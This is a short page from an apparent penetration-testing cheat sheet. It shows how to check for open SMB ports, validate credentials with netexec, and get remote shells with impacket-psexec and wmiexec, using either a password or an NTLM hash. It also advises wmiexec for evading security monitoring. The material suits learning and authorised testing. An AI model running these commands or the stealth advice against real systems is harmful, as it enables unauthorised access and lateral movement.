Using impacket-psexec or impacket-wmiexec

# Check if SMB port is open or not.
nmap -p 139,445 $IP

# If Port is open, you can confirm whether you are allowed to log in for the username and credential. If you get "pwned" THEN you are allowed to login.
netexec smb $IP -u $UserName -p '$Password' --continue-on-success

# Normal Login with Credential
impacket-psexec $UserName:'$Password'@$IP
impacket-wmiexec $UserName:'$Password'@$IP

# Using Hash
impacket-psexec -hashes :$NTLMhash $UserName@$IP
impacket-wmiexec -hashes :$NTLMhash $UserName@$IP

Use wmiexec for stealthier operations, fileless execution, and lower footprint, ideal for environments with tight security monitoring.
Use psexec if you need an interactive session and aren’t concerned about leaving traces or have full administrative privileges that allow service creation.

PreviousUsing SMBClient NextCracking For password

Last updated 1 year ago

hashtagUsing impacket-psexec or impacket-wmiexec

Using impacket-psexec or impacket-wmiexec